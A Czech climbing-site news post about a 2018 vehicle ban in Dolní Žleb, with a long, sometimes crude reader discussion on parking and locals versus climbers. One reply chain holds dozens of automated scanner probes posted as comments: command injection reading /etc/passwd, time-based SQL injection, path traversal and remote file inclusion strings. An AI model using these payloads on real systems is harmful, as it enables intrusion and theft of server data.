LEZEC  OBCHOD  DISKUSE  INZERCE  ANKETY  ODKAZY  PRŮVODCE  MAPY  FOTKY  VIDEO 

 jméno

 heslo 

 Registrace   |   Kudy mám lézt?? Nahoru!
Hledání cesty

Hledání na Lezci

PRÁCE PRO LEZCE
Fasádní Servis
 Metodika
 Trénink
 Oblasti
 Reportáže
Knihy
Update sprievodca Jelenec
Pomozte vydat knihu Dobrodružství v prášku… přidáte jen vodu
Křest lezeckého průvodce Vltavská žula

Závody
Secret Spot Bouldering 2024 (19.10)
MČR v bouldru (19.10)
Boulder OPEN 2020 LA SKALA (26.10)

Žebříček
Cesty:
1.Ondra 13491
2.Šindel 12475
3.Votoček 12318
Bouldry:
1.Konečný 11275
2.Stráník 11056
3.Volf 10962
Hory:
1.Groš 7777
2.Rojko 7436
3.Skopec 7324

Výsledky
MČR rychlolezení (13.10)
SP Praha (20.09)
EP obtížnost Bologna (14.09)

Deníčky
5667 lezců
1140270 cest
Nové přelezy:
Loose Cano 7b
Ajo En Vag 7C
Hammer Kin 7c
Mucho Tron 7b+
Directa Co 8c
Geografia 7c
Výstřik Do 9+
206 9-
Příště To 7C+/8A
J´Ai Toujo 7c+

Stěny
LSJ - Javorník
Umělá horolezecká stěna ZŠ Dr. Horáka - Prostějov
Horolezecká stěna Vrchlabí - MANGO - Vrchlabí

Prodejny
HUDYsport - Praha 1
Rock Point Olomouc - Olomouc
Husky Outdoor Shop - Plzeň

Kontakt
REDAKCE:
standalezec.cz
ŠÉFREDAKTOR:
jirkaslezec.cz
INZERCE:
standalezec.cz
IT:
hoplezec.cz

Zákaz vjezdu do Dolního Žlebu

Labské údolí

Aktuální změna ve vjezdu a souvisejícího parkování v Dolním Žlebu.

Vážení návštěvníci Dolního Žlebu,

vítáme Váš vzrůstající zájem o využívání k lezení, turistice i houbaření  vhodných levobřežních svahů Labského údolí. Avšak právě z toho důvodu dovolujme si Vás informovat o novém dopravním značení v této části Děčína.

Dne 5.6.2018 byly do prostorů obou železničních viaduktů v Dolním Žlebu instalovány dopravní značky, dále nad trať zakazující vjezd všech motorových vozidel. Značka B11 je doplněna dodatkovou značkou „mimo dopravní obsluhu“.


Značka Zákaz vjezdu všech motorových vozidel



Uvedené dopravní opatření je snahou o řešení vzrůstajícího automobilového provozu uvnitř obce a s tím souvisejícího nedostatku parkovacích míst. Tato situace je odvislá od nestandardních parametrů vnitřních komunikací, které při enormní zátěži již nejsou schopny zajistit průjezd vozidel majitelů nemovitostí, komunálních služeb a v neposlední řadě i vozidel integrovaného záchranného systému.

Alternativní parkovací místa do této chvíle nebyla stanovena, jednou z o něco méně pohodlnou možností tak jsou parkovací plochy v centru Děčína a využití služeb Českých drah. Prosíme, k parkování nevyužívejte ke spojovací silnici přilehlé plochy soukromých majitelů bez jejich výslovného souhlasu.

Děkujeme za pochopení a respektování nového dopravního značení.


  • Dopravní obsluhou se dle vyhlášky č. 294/2015 Sb. rozumí „vozidla zajišťující zásobování nebo lékařské, opravárenské, údržbářské, komunální a podobné služby, vozidla přepravující osobu těžce zdravotně postiženou, vozidla taxislužby a vozidla, jejichž řidiči, provozovatelé nebo přepravované osoby mají v místech za značkou bydliště, ubytování, sídlo nebo nemovitost."


    Labské údolí s Dolním Žlebem



    Osadní výbor Dolní Žleb

  • JirkaS   [úpravy] 10:18 06.06.2018Tisk 

    Reklama:


    Související články:

    Komentáře

         
    ...nové příspěvkyNový komentář 

     No konečně10:28:57 06.06.2018
    Jako člověk co se tam pohybuje velmi často i jako nelezec si myslím, že to mělo být už dávno. Teď už by jízda na kole nebo bruslích od Děčína plnohodnotně doplnit ten standard na německé straně.
    odpovědět 

     Konec lezení ve Žlebu?11:26:46 06.06.2018
    Trochu jsem čekal kdy k tomu dojde, protože situace opravdu začínala být neúnosná. Ale nemyslím si, že to je dobré řešení dát tam zákaz uprostřed lezecké sezóny, aniž by bylo řešeno kde zaparkovat ... Jedna věc, kterou nechápu, je proč se neudělala při nedávné rekonstrukci silnice z Čertovy vody do Žlebu širší s vyhrazeným pruhem pro cyklisty. Jasně, pak je tady pořád problém s parkováním ...
    ondrasodpovědět 
     Re: Konec lezení ve Žlebu?11:43:52 06.06.2018
    Proč? Jaký je přínos lezců pro místní? Proč není zákaz vjezdu dobrý nápad? Existuje nějaký důvod, proč by se někdo měl starat o to, kde zaparkuješ, až si půjdeš za zábavou?
    odpovědět 
      Re: Konec lezení ve Žlebu?12:33:20 06.06.2018
    S anonymy se nebudu bavit.
    ondrasodpovědět 
       Re: Konec lezení ve Žlebu?12:35:26 06.06.2018
    Tak proc se s nim tou vetou bavis?
    Spis to vypada na "anonymum nebudu odpovidat na neprijemne otazky".
    odpovědět 
        Re: Konec lezení ve Žlebu?13:13:40 06.06.2018
    Jestli ono mu náhodu nedošlo, že vlastně s tím zákazem mají pravdu :-)
    odpovědět 
        Re: Konec lezení ve Žlebu?13:33:32 06.06.2018
    Obecně mi vadí úroveň diskuzí na lezci způsobená právě anonymitou diskutérů. Pokud si člověk za svým názorem stojí, není důvod se nepodepsat. Já jsem svůj názor napsal a podepsal se. Na anonymní provokativní žvásty rozhodně odpovídat nebudu.
    ondrasodpovědět 
         Re: Konec lezení ve Žlebu?16:52:09 06.06.2018
    Aha, takže když to podepíšu Jaromír Hejlek, tak budeš spkojen?
    Jaromír Hejlekodpovědět 
          Re: Konec lezení ve Žlebu?18:40:01 06.06.2018
    krom etickeho zduvodneni to ma jeste technickou stranku - nevis jestli na tebe pokrikuje 10 anonymu nebo jeden.
    Zalezitost tak stara jako internetovy diskuse. Precti si na to tema neco.. at se tu furt znova nevynaleza kolo.
    TOAodpovědět 
           Re: Konec lezení ve Žlebu?18:57:27 06.06.2018
    Jo, to je pravda, ale on neuváděl tento důvod, ale jiný :-)
    odpovědět 
            Re: Konec lezení ve Žlebu?20:14:21 06.06.2018
    KROM ETICKEHO ZDUVODNENI...
    TOAodpovědět 
             Re: Konec lezení ve Žlebu?21:43:31 06.06.2018
    A prosím tě, nevíš také, co etika říká o vměšování se do diskuze s někým jiným? Já se zeptal konkrétně ondrase na jednu konkrétní věc a odpověděl mi někdo jiný na něco úplně jiného. To v pořádku je?
    odpovědět 
           Re: Konec lezení ve Žlebu?22:51:31 06.06.2018
    Jiste. Zato kdyz se nekdo nejak podepise a napise jakysi email, tak mas jistotu..
    odpovědět 
      Re: Konec lezení ve Žlebu?16:38:36 14.06.2018
    1
    response.write(9405041*9560095)odpovědět 
      Re: Konec lezení ve Žlebu?16:38:38 14.06.2018
    1
    '+response.write(9405041*9560095)+'odpovědět 
      Re: Konec lezení ve Žlebu?16:38:41 14.06.2018
    1
    "+response.write(9405041*9560095)+"odpovědět 
      Re: Konec lezení ve Žlebu?16:42:23 14.06.2018
    1
    &cat /etc/passwd&odpovědět 
      Re: Konec lezení ve Žlebu?16:42:27 14.06.2018
    1
    '&cat /etc/passwd&'odpovědět 
      Re: Konec lezení ve Žlebu?16:42:30 14.06.2018
    1
    "&cat /etc/passwd&"odpovědět 
      Re: Konec lezení ve Žlebu?16:42:33 14.06.2018
    1
    cat /etc/passwd odpovědět 
      Re: Konec lezení ve Žlebu?16:42:37 14.06.2018
    1
    `cat /etc/passwd`odpovědět 
      Re: Konec lezení ve Žlebu?16:42:41 14.06.2018
    1
    |cat /etc/passwd#odpovědět 
      Re: Konec lezení ve Žlebu?16:42:44 14.06.2018
    1
    '|'ldodpovědět 
      Re: Konec lezení ve Žlebu?16:42:48 14.06.2018
    1
    "|"ldodpovědět 
      Re: Konec lezení ve Žlebu?16:42:52 14.06.2018
    1
    ;cat /etc/passwd;odpovědět 
      Re: Konec lezení ve Žlebu?16:42:55 14.06.2018
    1
    ';cat /etc/passwd;'odpovědět 
      Re: Konec lezení ve Žlebu?16:42:58 14.06.2018
    1
    ";cat /etc/passwd;"odpovědět 
      Re: Konec lezení ve Žlebu?16:43:02 14.06.2018
    1
    ||cat /etc/passwdodpovědět 
      Re: Konec lezení ve Žlebu?16:43:41 14.06.2018
    1
    1 and sleep(8.53) odpovědět 
      Re: Konec lezení ve Žlebu?16:43:44 14.06.2018
    1
    1 or (sleep(8.53)+1) limit 1 -- odpovědět 
      Re: Konec lezení ve Žlebu?16:43:48 14.06.2018
    1
    1' and sleep(8.53)='odpovědět 
      Re: Konec lezení ve Žlebu?16:43:51 14.06.2018
    1
    1' and (sleep(8.53)+1) limit 1 -- odpovědět 
      Re: Konec lezení ve Žlebu?16:43:54 14.06.2018
    1
    1" and sleep(8.53)="odpovědět 
      Re: Konec lezení ve Žlebu?16:43:58 14.06.2018
    1
    1' or (sleep(8.53)+1) limit 1 -- odpovědět 
      Re: Konec lezení ve Žlebu?16:44:03 14.06.2018
    1
    1" or (sleep(8.53)+1) limit 1 -- odpovědět 
      Re: Konec lezení ve Žlebu?16:44:07 14.06.2018
    1
    1'=sleep(8.53)='odpovědět 
      Re: Konec lezení ve Žlebu?16:44:12 14.06.2018
    1
    1"=sleep(8.53)="odpovědět 
      Re: Konec lezení ve Žlebu?16:44:15 14.06.2018
    1
    1;select pg_sleep(8.53); -- odpovědět 
      Re: Konec lezení ve Žlebu?16:44:20 14.06.2018
    1
    1';select pg_sleep(8.53); -- odpovědět 
      Re: Konec lezení ve Žlebu?16:44:24 14.06.2018
    1
    1; waitfor delay '0:0:8.53' -- odpovědět 
      Re: Konec lezení ve Žlebu?16:44:28 14.06.2018
    1
    1'; waitfor delay '0:0:8.53' -- odpovědět 
      Re: Konec lezení ve Žlebu?16:44:32 14.06.2018
    1
    1"; waitfor delay '0:0:8.53' -- odpovědět 
      Re: Konec lezení ve Žlebu?16:44:55 14.06.2018
    1
    SomeCustomInjectedHeader:injected_by_wvsodpovědět 
      Re: Konec lezení ve Žlebu?16:44:59 14.06.2018
    1
    SomeCustomInjectedHeader:injected_by_wvsodpovědět 
      Re: Konec lezení ve Žlebu?16:45:03 14.06.2018
    1
    SomeCustomInjectedHeader:injected_by_wvsodpovědět 
      Re: Konec lezení ve Žlebu?17:02:18 14.06.2018
    1
    ../../../../../../../../../../etc/passwdodpovědět 
      Re: Konec lezení ve Žlebu?17:02:23 14.06.2018
    1
    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%0odpovědět 
      Re: Konec lezení ve Žlebu?17:02:27 14.06.2018
    1
    ../../../../../../../../../../etc/passwd.jpgodpovědět 
      Re: Konec lezení ve Žlebu?17:02:33 14.06.2018
    1
    Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5nodpovědět 
      Re: Konec lezení ve Žlebu?17:02:37 14.06.2018
    1
    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%0odpovědět 
      Re: Konec lezení ve Žlebu?17:02:43 14.06.2018
    1
    /../..//../..//../..//../..//../..//etc/passwd.jpgodpovědět 
      Re: Konec lezení ve Žlebu?17:02:47 14.06.2018
    1
    .\\./.\\./.\\./.\\./.\\./.\\./etc/passwdodpovědět 
      Re: Konec lezení ve Žlebu?17:02:52 14.06.2018
    1
    /etc/passwdodpovědět 
      Re: Konec lezení ve Žlebu?17:02:57 14.06.2018
    1
    ../..//../..//../..//../..//../..//../..//../..//../..//etc/passodpovědět 
      Re: Konec lezení ve Žlebu?17:03:02 14.06.2018
    1
    ../.../.././../.../.././../.../.././../.../.././../.../.././../.odpovědět 
      Re: Konec lezení ve Žlebu?17:03:05 14.06.2018
    1
    ${99410+99365}odpovědět 
      Re: Konec lezení ve Žlebu?17:03:07 14.06.2018
    1
    ..ŔŻ..ŔŻ..ŔŻ..ŔŻ..ŔŻ..ŔŻ..ŔŻ..ŔŻetc/passwdodpovědět 
      Re: Konec lezení ve Žlebu?17:03:12 14.06.2018
    1
    invalid../../../../../../../../../../etc/passwd/././././././././odpovědět 
      Re: Konec lezení ve Žlebu?17:03:16 14.06.2018
    1
    file:///etc/passwdodpovědět 
      Re: Konec lezení ve Žlebu?17:03:21 14.06.2018
    1
    /\../\../\../\../\../\../\../etc/passwdodpovědět 
      Re: Konec lezení ve Žlebu?17:03:26 14.06.2018
    1
    WEB-INF/web.xmlodpovědět 
      Re: Konec lezení ve Žlebu?17:03:31 14.06.2018
    1
    WEB-INF\web.xmlodpovědět 
      Re: Konec lezení ve Žlebu?17:05:13 14.06.2018
    1
    1odpovědět 
      Re: Konec lezení ve Žlebu?17:05:17 14.06.2018
    1
    268435455odpovědět 
      Re: Konec lezení ve Žlebu?17:05:21 14.06.2018
    1
    ăhodpovědět 
      Re: Konec lezení ve Žlebu?17:05:25 14.06.2018
    1
    ..ŔŻodpovědět 
      Re: Konec lezení ve Žlebu?17:05:28 14.06.2018
    1
    1e309odpovědět 
      Re: Konec lezení ve Žlebu?17:05:33 14.06.2018
    1
    '"\'\");|]*{ <>odpovědět 
      Re: Konec lezení ve Žlebu?17:05:38 14.06.2018
    1
    1odpovědět 
      Re: Konec lezení ve Žlebu?17:12:36 14.06.2018
    1
    http://some-inexistent-website.acu/some_inexistent_file_with_lonodpovědět 
      Re: Konec lezení ve Žlebu?17:12:40 14.06.2018
    1
    1some_inexistent_file_with_long_name%00.jpgodpovědět 
      Re: Konec lezení ve Žlebu?17:12:45 14.06.2018
    1
    http://testasp.vulnweb.com/t/fit.txt?%00.jpgodpovědět 
      Re: Konec lezení ve Žlebu?17:12:50 14.06.2018
    1
    testasp.vulnweb.comodpovědět 
      Re: Konec lezení ve Žlebu?17:47:30 14.06.2018
    1
    )odpovědět 
      Re: Konec lezení ve Žlebu?17:47:38 14.06.2018
    1
    !(()&&!|*|*|odpovědět 
      Re: Konec lezení ve Žlebu?17:47:44 14.06.2018
    1
    ^(#$!@#$)(()))******odpovědět 
      Re: Konec lezení ve Žlebu?17:53:57 14.06.2018
    1
    1odpovědět 
      Re: Konec lezení ve Žlebu?17:54:04 14.06.2018
    1
    '"()odpovědět 
     Re: Konec lezení ve Žlebu?12:30:00 06.06.2018
    Da se v pohode parkovat v Decine (pod mostem, u hriste) a dojit pesky. Proc si porad chteji lezci vozit prdel az pod skaly..
    odpovědět 
      Re: Konec lezení ve Žlebu?12:53:42 06.06.2018
    Tak semtam je v tom nějaký logicky pochopitelný zdravotní důvod, ale vetšinou a) je to trend, všude dojet autem b) lezci mají dost často potřebu ukázat že My jsme LEZCI (ne chodci)...
    odpovědět 
       Re: Konec lezení ve Žlebu?22:53:19 06.06.2018
    Samozrejme pokud je nejaky zdravotni duvod, vychazel bych vstric. Ale borcum co pak drti na pisku fakt ne. Tech par kroku by zvladnout meli.
    odpovědět 
      Re: Konec lezení ve Žlebu?22:37:40 07.06.2018
    No, i když si dovezeš "prdel pod skály" a zaparkuješ u kostela, musíš tu svojí prdel ještě dostat nahoru ke skalám... a to s plnou polní (lano, presky atd.prostě něco váží) a když s sebou do skal bereš děti, tak je to taky slušný proviant... Takže ačkoli rozhodně nejsem ani třasořitka ani lenoch, z Děčína pod mostem to prostě se dvěma malýma dětma nedám... Koneckonců bruslaři a cyklisti, co tam jezdí si taky dojedou k cyklostezce většinou autem...
    Janaodpovědět 
       Re: Konec lezení ve Žlebu?23:25:58 07.06.2018
    To jsou argumenty... Je normální, že něco s dětmi prostě nejde. Jezdil jsem dálky na kole, s dětmi jsme jezdili obyč výlety, odrostly a teď zase jezdím dálky. Tak prostě tu svojí prdel, jak píšeš, doprav jinam, jeď si zalézt jinam, a sem se vrátíš zase až budeš schopná to ujít.
    odpovědět 
       Re: Konec lezení ve Žlebu?00:26:21 08.06.2018
    Tak tam nejezdi, ne? Ne kazda oblast je pro kazdeho. Pokud ti vadi pulhodina chuze navic, tak to fakt neni pro tebe.
    Jen by me vlastne zajimalo, co ze to tam s temi detmi kterym musis vsechno nosit na tom levem brehu lezes?
    odpovědět 
      Re: Konec lezení ve Žlebu?23:37:04 07.06.2018
    V Děčíně pod mostem? To je 9 km jen k viaduktu vole.
    Prudič odpovědět 
       Re: Konec lezení ve Žlebu?00:28:54 08.06.2018
    9 km to neni. A pokud to nezvladnes, tak to asi neni oblast pro tebe. Nebo jed vlakem.
    odpovědět 
        Re: Konec lezení ve Žlebu?22:14:43 08.06.2018
    Od Tyršáku 8,8. Z horního žlebu 6,4 km. A nemel tady nesmysly.
    Prudičodpovědět 
         Re: Konec lezení ve Žlebu?22:33:58 08.06.2018
    Tak jo. Fakt hodne, to jen tak nejaky lezec neda...
    odpovědět 
          Re: Konec lezení ve Žlebu?10:00:58 10.06.2018
    Jo, každej to nedá. Časově. Každej nemá tolik času jako ty, kterej vymejšlíš hovadiny.
    Prudičodpovědět 
           Re: Konec lezení ve Žlebu?11:26:52 10.06.2018
    Tak to tam pak kazdej nepojede. Funguje to tak ve vsem v zivote - kdyz nemam cas, tak to nedelam. Co ti na tom prijde divne?
    odpovědět 

     A teď prakticky11:31:38 06.06.2018
    Co to v reálu znamená? Autem mohu z Děčína směrem do Dolniho Žlebu dojet az kam? Zaparkovat mohu kde? Je rozdíl mezi všedním dnem a vikendem? Rozumím značce zákaz zastaveni a zákaz stání, ale téhle moc ne - vymahatelnost je dle mého názoru zcela minimální. Nejde mi o popruzovani, naopak - je mi jasny, ze určitou udrzitelnou miru je třeba udržet. Poradte ...
    J.Kladaodpovědět 
     Re: A teď prakticky11:39:11 06.06.2018
    No, to je docela jednoduchý. Dojedeš až tam, kde je ta značka a dál nesmíš, pokud nejsi člověk co tam má nějakou nemovitost, nebo zásobování. A ohledně vymahatelnosti. Zásobování má vždy za čelním sklem nějakej papír, člověk co tam má nemovitost tak si parkuje u ní. A ten, kdo tam nemá co dělat, tak dostane hold pokutu no ;)
    odpovědět 
     Re: A teď prakticky11:42:43 06.06.2018
    Však oni ti to policajti už vysvětlí :-)
    odpovědět 
     Re: A teď prakticky11:46:35 06.06.2018
    ...do prostorů obou železničních viaduktů v Dolním Žlebu instalovány dopravní značky, dále nad trať zakazující vjezd...
    odpovědět 
      Re: A teď prakticky12:11:06 06.06.2018
    OK - takže vlastně žádná odpověď. Když si prectu výklad te značky - tak zásobovacem může byt kdokoliv, minimální doba na vykládku není definována, ubytován (předpokládám ze i krátkodobě) mohu byt u kohokoliv atd. atd. Takže ještě jednou a reálně: je ctvrtek, zaparkuju na placku u horochaty nad kostou - dostanu pokutu nebo ne? Vlastně mi az tak nejde o ty prachy jako spis o to, zda tím budu někoho místního stvat - já osobně myslím, ze ani jedno z uvedeneho by nastat nemělo. Je vcelku jasný, ze město Děčín by soucasne s umístěním těchto značek mělo vytvořit i možnosti parkování včetně placeného - to je standardní postup. Takhle je uvozujici veta o nadšení ze zájmu o místo jenom fráze.
    J.Kladaodpovědět 
       Re: A teď prakticky12:31:39 06.06.2018
    Aaaa, pravnik amater.. Parkovat muzes v pohode v Decine treba pod mostem. A dal dojit pesky. Lezci, nebojte se tolik toho pohybu, je prospesny..
    odpovědět 
       Re: A teď prakticky13:03:52 06.06.2018
    Hm, koukám můj příspěvěk s citací někdo upravil, škoda. Každopádně: Já jsem ze starý školy hele a tobě by za tu kombinaci neznalosti a pokusu o hledání mezer ve vyhláškách měli sebrat papíry. Tedy, pokud je máš. Spíše mi totiž přijde, že tvé "dojedu, zaparkuju" je myšleno jako spolujezdec - aspoň podle tvého přehledu o dopravních značkách a souvisejícího právního prostředí. Jenže kdyby za tohle byly odebírány papíry, nestačila by v ČR velmi brzy kapacita veřejný dopravy.
    To jsem ale odbočil, omlouvám se. je ot jednoduché: Můj dům, můj hrad. Nebo taky Jejich prostor, jejich pravidla. Holt je turisti srali tak dlouho a tak intensivně, že se jali konečně jednat. Takto se prostě rozhodli a je to jejich právo. Poukazovat na to, že by "měli" zajistit jiné parkovací plochy apod. ptákoviny je zhovadilost.
    odpovědět 
        Re: A teď prakticky13:08:18 07.06.2018
    Blbost, jejich právo je jen střežit svůj hrad, nic jiného jim nepatří. Tady je to samej komouš, zakazovat, zakazovat, zakazovat!!!
    spravedlivýodpovědět 
         Re: A teď prakticky14:00:54 07.06.2018
    Komousky spis je myslet si, ze vsechno patri vsem a mit skupinku lidi, ktera si mysli ze muze vice nez ostatni. Prave treba na ukor mistnich.
    odpovědět 
        Re: A teď prakticky08:39:56 08.06.2018
    Ajajaj - tak nic. Smysl si nepochopil. Řekl bys mi to do oči? Za mne, pokud to slo/jde carpooluju/val jsem v Děčíně. Jeden znamej nemeckej prvovystupce ma ode mne vzkaz o debilnim parkování na kruhacku po V rohem. Když je to zjevný upozorňoval jsem na debilni parkování tamtéž i jiný lezce - naposledy par dnu před umístěním značek. Do Žlebu jezdim v podstatě už jen ve všední den - a upřímně tehdy tyhle značky nemaji žádný reálný vyznam - nájezdníci jaksi chybi. Ony taky ve všední den na 99% nebudou vymahany, jelikož nebude zalobce. Jestli tuhle debatu čte někdo z osadního výboru DŽ, tak bych navrhoval omezte to na víkend -to je to, co vas pálí.
    J.Kladaodpovědět 
       Výklad značek na Lezci?13:12:27 06.06.2018
    Hele, a proč se ptáš na výklad dopravních značek na Lezci?
    odpovědět 
       Re: A teď prakticky13:17:03 06.06.2018
    Praktické vymáhání vypadá tak, že tě za značkou policajti zastaví a zeptají se, co tam děláš. Pokud řekneš, že u někoho bydlíš, nalepí se ti na zadek a osobně pojedou zkontrolovat u koho, proč a kde. S obsluhou totéž. Není tak jednoduché se vykroutit - odhlédneme-li od toho, že by se správný občan vůbec vykrucovat neměl :o)
    F.odpovědět 
        Ku*va, ty ku*do,13:50:36 06.06.2018
    ...ty nevíš, na koho blikáš?!

    Jo, tihle správní občané, strážci zákona jdou vzorem

    1url.cz/otyJP
    ivošodpovědět 
         Re: Ku*va, ty ku*do,16:41:05 06.06.2018
    Co ma tohle proboha spolecne s praci policie a slusnym chovanim obecne? A co konrektne to ma spolecneho s hlidkou v Zlebu?

    Je to to same jako kdybychom zde dali jako dukaz toho, ze vsichni lide jsou debilove nejake video kde nejaky nepolicajt se chova jako kreten (a takovych videi je hromada).
    odpovědět 
          Re: Ku*va, ty ku*do,05:52:17 07.06.2018
    video není netřeba, zda se...
    opcan s opcankouodpovědět 
     Re: A teď prakticky14:10:10 06.06.2018
    Uplne ich chapem, tych aut tam bolo naozaj pozehnane. V principe to aj schvalujem, ale ked pojdem autom z Decina do Hrenska a preplavim sa kompou na druhu stranu narazim na tu zakazovu znacku? Jedna sa mi o to, ze ked ma budu pokutovat a pojdem prave tymto smerom ako som pisal, ci mi aj niekto uveri z tych policajtov, ked na tu znacku nenarazim...
    Peterodpovědět 
      Re: A teď prakticky15:35:32 06.06.2018
    Píšou že zákaz je u viaduktů. Takže přijedeš přívozem, zjistíš že na plácku u přívozu je plno, takže se vrátíš zpátky na přívoz nebo po silnici podél Labe do Děčína. To tě nasere, takže příště pojedeš jinam. Místní budou spokojeni.

    Časem asi zkrachujou ty místní dvě hospody, kam stejně místní nechoděj a jinak bude vše OK. Zaměstnanci hospody půjdou na pracák a místní osadníci do Kauflandu pro lahváče.
    Arcikacířodpovědět 
       Re: A teď prakticky16:43:03 06.06.2018
    Mistni tam nechodi (jak pises), ale po krachu pujdou mistni (ti co tam nechodi) pro lahvace do kauflandu. Jasne..
    odpovědět 

     pravnicky vyklad12:02:47 06.06.2018
    Ta znacka tam je abychom nezapomeli na svacinu. Diky predsedo! Proste kdyz tam zajedes, bud tam musis chvili zustat, bys tam mel todleto ubytovani. Ale  bude stacit, kdyz budes samozasobitel a povezes si svacinu do skal. Musis si na to napsat ovsem cedulku. Bez cedulky pokuta! 
    svacinarodpovědět 

     klidek12:11:12 06.06.2018
    Takze misto aby pro navstevniky postavili hospodu a parkoviste, tak jim radeji zakazi vjezd...
    Kolik platime obyvatelum Decina a okoli na socialnich davkach?
    odpovědět 
     Re: klidek12:34:17 06.06.2018
    Vsak tam muzes. Pesky, nakole, na bruslich. Proc cekat, ze si vsude dovezes prdel az pod skaly? Nejsi na umelce.
    A proc by nekdo delal neco specialniho pro komunitu lezcu, ktera oblasti v porovnani s ostatnimi komunitami neprinasi skoro nic?
    odpovědět 
      Re: klidek12:47:26 06.06.2018
    těžko se jim divit. vyleze slunce a najíždějí davy cizí a přespolní, zablokujou vesnici, místní nemají kde parkovat, sanitka co vozí starou Vomáčkovou na dialýzu neprojede, řvou tam večer pod oknama jak bejci, ráno lezou rozespalí z dodávek a pouštějí si k tomu ducduc rádio a nacpou svoje odpadky místním do popelnic (a popeláři tuplem neprojedou).

    ale o kousek dál, ve šmilce, v rathenu, a vůbec skoro všude to funguje, před vesnicí zákaz vjezdu (dodržovaný a vymáhaný). ale pravda je, že parkoviště tam je (někdy za pár éček) a od parkoviště se dá rozumně pěšky dojít.
    Lukas B.odpovědět 
      Re: klidek15:23:17 06.06.2018
    Ty blbe koho myslíš těmi dalšími komunitami přinášejícími co? Jinak se zákazem souhlasím a klidně si do skal dojdu.
    FERYodpovědět 
       Re: klidek16:46:52 06.06.2018
    Cyklisty, bruslare, vyletniky, ... vsech je stokrat vice nez lezcu. I kdyz, dle tveho stylu, ty asi odpved nechces, vid?
    odpovědět 
        Re: klidek16:47:39 06.06.2018
    A ta nejvetsi - mistni obyvatele.
    odpovědět 
         Re: klidek19:14:41 06.06.2018
    Místní obyvatelstvo opustil rozum nejpozději kolem roku 1935. Od té doby jsou severní Čechy prokleté a nepomohla tomu ani výměna místního obyvatelstva za jiné.

    Na Labák seru, ale nemůžu nesrovnat se Sedmihorkama. Tam jim taky parkovali cizáci, tak odmontovali značku zákaz zastavení, místo ní nainstalovali značku parkoviště, když je silnice plná, parkuje se na obecní louce. Každého skásnou o 50 Kč,což je rozumná částka, která nikoho neprudí. Do obecní kasy si ročně přijdou na 1M a všichni jsou spokojený.
    Arcikacirodpovědět 
          Re: klidek21:40:34 06.06.2018
    Vsichni jsou spokojeny.... Jakoze si maj lidi nechat zasirat svuj domaci zivotni prostor za 1M do obecniho rozpoctu a jeste s tim bejt spokojeny??? Ohebna zada asi mas, mocinky moc ohebna.
    odpovědět 
           Re: klidek21:45:24 06.06.2018
    No spíš si myslí, že z peněz se všichni podělají a za pár korun navíc klidně budou žít na parkovišti. Že je pro někoho klid a pohoda víc, než naditá šrajtofle, je pro něj očividně novinka :-)
    odpovědět 
            Re: klidek22:15:40 06.06.2018
    Chtělo byse to tam s nima pořádně poškorpit, když oni takhle :-D
    odpovědět 
            Re: klidek10:14:20 07.06.2018
    Tak s takovouhle bych mohl postavit barikádu na silnici, která vede kolem baráku kde bydlím.
    Za den tam projede více aut, než jich je registrovaných v bývalém okresu Děčín. Vesměs cizáci, který tam jedou kvůli svým zájmům, který mě nazajímaj.

    Taky zasíraj můj životní prostor, dokonce mnohem horším způsobem, místo kapajícího oleje z vodstavenýho šrotu samý smrtelně jedovatý diesely, tak na to mám přeci právo, ne ?
    Arcikacířodpovědět 
             Re: klidek12:14:11 07.06.2018
    No a co ti v tom brání? Udělej to, co udělali místní zde. Sepiš si podklady, oslov úřad a když to dobře zdůvodníš a požadavek bude oprávněný a realizovatelný, určitě ti to schválí a zákaz vjezdu tam namontují také. Máš stejné možnosti, jako měli v Dolním Žlebu.
    odpovědět 
             Re: klidek14:02:44 07.06.2018
    Tak proc se to nesnazis nejak resit? Zvedni prdel, nebrec na internetu a kontaktuj magistrat.
    odpovědět 
             Re: klidek15:21:42 07.06.2018
    ale kdyby platili mýtné, ze kterého by do rozpočtu tvé obce bylo dejme tomu 1M ročně, byl bys spokojenej jo? Zní to divně, viď? Ale o pár postů vejš jsi to celkem jasně sám řek;))))))) fuck.
    odpovědět 
           Re: klidek08:54:46 08.06.2018
    A proto se denně koukají na tři prdele kolařů, bruslařů a jiných obtloustlých přinašečů pokroku do vesnic jak se píše výše.
    FERYodpovědět 
          Re: klidek21:40:45 06.06.2018
    Kolik cizích parkovalo zde a kolik jich parkuje v Sedmihorkách? Ale nic to nemění na tom, že vycházíš ze špatného předpokladu, tedy že místní jen neví, jak to zařídit, abyste tam mohli jezdit. To je omyl. Oni vůbec nechtějí, abyste tam jezdili, a to ani kdyby z toho měli mít to mega čistého ročně. Prostě pro řadu lidí má klid přednost před penězi. Co na tom ještě nechápeš?
    odpovědět 
        Re: klidek08:52:12 08.06.2018
    A můžeš mi ještě objasnit jaký mají tyto skupiny přínos? Kromě teda toho že si občas koupí pivo a klobásu z čehož místňáci nemají ani korunu. A právě protože jich je tam mnohem více akorát zasírají celou oblast.
    FERYodpovědět 
         Re: klidek10:42:39 08.06.2018
    No samozrejme mnohem mensi nez lezci, kteri tam jen parkuji! Nechapu tuhle hnusnou honbu na nas, lezce...
    odpovědět 
          Re: klidek10:46:58 08.06.2018
    Soudíš podle sebe nebo tam nejezdíš?
    odpovědět 
           Re: klidek01:12:09 09.06.2018
    Podle tebe soudim sebe a pak vse ostani, prece! Lezci nadevse!
    odpovědět 
     Re: klidek12:59:52 06.06.2018
    Jasne !!! zakaz je vzdy nejednouzsi a nejrychlejsi reseni situace, vetsinou take nejhorsi. No co se da delat ?? Budu jezdit jinam !Ukradnout ci vybrat si v Decine auto nenecham.Tam je to skoro 100pro.
    odpovědět 
      Re: klidek13:11:02 06.06.2018
    Super. Přesně o tohle jim šlo. Jak je vidět, udělali to dobře.
    odpovědět 
       Re: klidek16:24:08 06.06.2018
    Ano, silnější pes mrdá.
    odpovědět 
      Re: klidek13:22:36 06.06.2018
    Je to stejně inteligentní řešení, jako jsou modré zóny, které se rozlézají do všech měst. Prostě místní maj pocit, že přespolní je serou, zabíraj jim místo a vůbec by se jim mělo zakázat k nim jezdit, ať maj klid.

    Taky na ně jednou dojde, až budou chtít někam jet a budou nasraný, že tam nesměj, protože karta se otočila a nechtěný přespolní jsou tentokrát oni.
    Arcikacířodpovědět 
       Re: klidek13:28:41 06.06.2018
    Ale takto je to v pořádku, ne?
    odpovědět 
